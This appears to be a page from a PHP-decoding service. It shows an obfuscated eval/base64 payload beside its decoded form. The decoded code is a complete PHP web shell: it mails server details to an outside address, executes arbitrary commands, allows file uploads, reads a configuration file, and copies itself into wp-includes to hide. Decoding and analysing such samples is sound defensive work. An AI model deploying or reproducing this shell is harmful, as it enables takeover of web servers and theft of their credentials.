Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHci/q2io49EEnKohsOeJcIx0Jl4T7..
Decoded Output download
?><?
@ini_restore("disable_functions");
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Shell Injector
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$df='ini_get disable!';
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Shell Result http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-info.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>BArNEr</title><br><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
echo "<font size=2 color=#888888><b>Disable Functions : ";$df='ini_get disable!';
if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "NONE";}else{echo "$df";}
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}
if(isset($_GET['baca'])){
$conf = file_get_contents("../../configuration.php");
echo $conf;
}
?><?
Did this file decode correctly?
Original Code
<?php eval(gzinflate(str_rot13(base64_decode('rUl6QttVEP58VfyHci/q2io49EEnKohsOeJcIx0Jl4T7Ashl7A1M8Ju8eNIU8d87s3jnpSkcPTUCxZls5mifnfHJZOtxe+tHpMIvuEdMwS0aCRmMcO5CyjRHIlgltY+2t8SESztPV66shj/0hsNhv2rNxsF98MBhevuXp+2txqOQT4VMmSrikn0wd8z4GB7RYPCvN7imn1OjWP9Gfziit6gW6f2abeD9ZuUNVP7VoHgA4yyaA4IOpzyOVje95yEkVmFF9IzmFEQymPBxP+KA1KXcTpIMhX6SUpwt0l8AevLUkDwsC6Hm6P2s4/kX/bYHDvqdDj1t3t7iseSvoG0AwtDRxHJIVU+qzu0wnRQvZV64oJhzRY3ndpBjeEQqM9/+TLs9gP5IzeAPS51YXjIaaxf9kbdvlAQituiDmAdBmh4cHJzeocQJs4TuEqrbVGqr7g24LHBSplflh81z3UB1cl3jWtq9JFBePGXMoSrgJiUgrTsP4jpazYpaKkcnv+zgBuL9e906MbF3Ov3lja5MGHQpVCohk3FJFiFf5QYbng+6lyO/0/3b651da1nzIwLSCuIuRO3++dWF1xv5g35/xGEd2pzleyIN4xKg5mySOfk0VOIU3PTXUdslxp160v+JrDp8E6sODasAFEEzT1tXqJgf/2xJ9Lyi1TS/TeNP/3D2FXmSwWiT4gtqfyNuFsMZ/fpEfwBrWZ1SLIe2muOFZAOEfglU7EWLOkOaDwLoh9JPy2mo/dYYSmAAyZciZbWncQ6P4G4RwqHkYam8+0m5mtab4uGhTkCKx+iX+gjtH2rTNpeVZ+oxhy6PXr7QwErrtJ6JPv8spJJJDXK2Wt69IxZwrnihjyVwNsYpYIHkJsVev+fBmSMtKgkYeBLUY5LPoF8EL1I4i8x5CERxRXeUrkdSkXTST/0ueDJ9g7R3B2gxQrXK3vuAioKrslUJVxwA16R8TZHr60zJvxfi5uZUbwD65SBIIKycwWQVCVZj9AFMLmRWkED3wKX0+PXDPM+SJFWjmgMtkealIneeZpcq/kxEgjRkdphRZ107LMeJS+qNH1ceg7jUvx8A38TMjtnRbaYcDlW7VWCsijwolMbtUoEK6szrZbCa/yjhKo+zICIdEWZdUxPRG9VZUhTxtMpJmtzXABOwr9RrvfAnrW9+NN5ezaLHdNr6kKwmseIfu3asP/xExVb5DB8oCeNAV0oFeAYmyVdUx3fRW0bwTXtKaQJp7JoZ420rlNoiErie8uUd2HboPHebKh0wbdIKvVJjegyvTN0SaQs4DdI8WbJU7hvvPPIRYH3XUSW5YsxgTCyyZGeYKpmf4gqrNeOgcwV5aB7hdXsmc4eQNf2wDFAuJUQgZb5oB/P3sA2zjTzr27bR5Ir0aJfhjuiWSMok0qu2GqlswUoZ9HvNoH39gX0j8V0DxiMPLfSkB7MhRBN66eq7AfkfQUwsyV4csBccYr5KjIMwS5SWpROoDc/A1zsP7G7nVkuBQRP+Qy/uyiLAu6vfEuy6Z3p4b5zAWPNK')))); ?>
Function Calls
| gzinflate | 1 |
| str_rot13 | 1 |
| base64_decode | 1 |
Stats
| MD5 | 76a4e40542bdabc98a8251f26da5fd74 |
| Eval Count | 1 |
| Decode Time | 82 ms |